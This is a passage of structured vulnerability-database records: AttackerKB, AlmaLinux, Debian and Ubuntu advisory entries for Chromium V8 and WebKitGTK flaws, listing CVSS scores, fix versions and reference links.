"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:38:37", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:00:00", "type": "attackerkb", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2023-10-07T00:00:00", "id": "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "href": "https://attackerkb.com/topics/Jr4SM2pfMz/cve-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "almalinux": [{"lastseen": "2023-11-17T11:35:32", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "almalinux", "title": "Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-21T08:29:39", "id": "ALSA-2023:1918", "href": "https://errata.almalinux.org/9/ALSA-2023-1918.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T20:25:30", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "almalinux", "title": "Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-21T08:37:18", "id": "ALSA-2023:1919", "href": "https://errata.almalinux.org/8/ALSA-2023-1919.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-17T11:35:32", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the AlmaLinux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-09T00:00:00", "type": "almalinux", "title": "Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-11T21:21:06", "id": "ALSA-2023:2653", "href": "https://errata.almalinux.org/9/ALSA-2023-2653.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T20:25:30", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the AlmaLinux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-16T00:00:00", "type": "almalinux", "title": "Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-19T22:01:27", "id": "ALSA-2023:3108", "href": "https://errata.almalinux.org/8/ALSA-2023-3108.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-11-30T18:42:13", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5390-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 16, 2023 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2023-2033\nDebian Bug : 1034406\n\nMultiple security issues were discovered in Chromium, which could result\nin the execution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 112.0.5615.121-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-16T17:38:41", "type": "debian", "title": "[SECURITY] [DSA 5390-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-16T17:38:41", "id": "DEBIAN:DSA-5390-1:E9996", "href": "https://lists.debian.org/debian-security-announce/2023/msg00080.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T09:59:14", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5263-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 29, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-3723\n\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 107.0.5304.87-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-29T20:36:13", "type": "debian", "title": "[SECURITY] [DSA 5263-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-29T20:36:13", "id": "DEBIAN:DSA-5263-1:A8269", "href": "https://lists.debian.org/debian-security-announce/2022/msg00233.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T10:08:45", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5295-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nDecember 04, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-4262\n\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 108.0.5359.94-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-04T20:33:03", "type": "debian", "title": "[SECURITY] [DSA 5295-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-04T20:33:03", "id": "DEBIAN:DSA-5295-1:10985", "href": "https://lists.debian.org/debian-security-announce/2022/msg00266.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:36:24", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5121-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 16, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-1364\n\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 100.0.4896.127-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-16T18:29:01", "type": "debian", "title": "[SECURITY] [DSA 5121-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-04-16T18:29:01", "id": "DEBIAN:DSA-5121-1:3B3A1", "href": "https://lists.debian.org/debian-security-announce/2022/msg00089.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:36:57", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5110-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMarch 28, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-1096\n\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code if a malicious website is visited.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 99.0.4844.84-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-28T07:03:21", "type": "debian", "title": "[SECURITY] [DSA 5110-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T07:03:21", "id": "DEBIAN:DSA-5110-1:CD232", "href": "https://lists.debian.org/debian-security-announce/2022/msg00078.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-11-09T13:23:47", "description": "A use after free issue was addressed with improved memory management. This\nissue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1\nand iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web\ncontent may lead to arbitrary code execution. Apple is aware of a report\nthat this issue may have been actively exploited.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "ubuntucve", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-10T00:00:00", "id": "UB:CVE-2023-28205", "href": "https://ubuntu.com/security/CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T13:19:28", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage. (Chromium security severity: High)\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T00:00:00", "type": "ubuntucve", "title": "CVE-2023-2033", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-14T00:00:00", "id": "UB:CVE-2023-2033", "href": "https://ubuntu.com/security/CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:31:51", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage. (Chromium security severity: High)\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-3723", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-11-01T00:00:00", "id": "UB:CVE-2022-3723", "href": "https://ubuntu.com/security/CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:38:00", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T00:00:00", "type": "ubuntucve", "title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-07-26T00:00:00", "id": "UB:CVE-2022-1364", "href": "https://ubuntu.com/security/CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:30:37", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage. (Chromium security severity: High)\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T00:00:00", "type": "ubuntucve", "title": "CVE-2022-4262", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-02T00:00:00", "id": "UB:CVE-2022-4262", "href": "https://ubuntu.com/security/CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:38:18", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 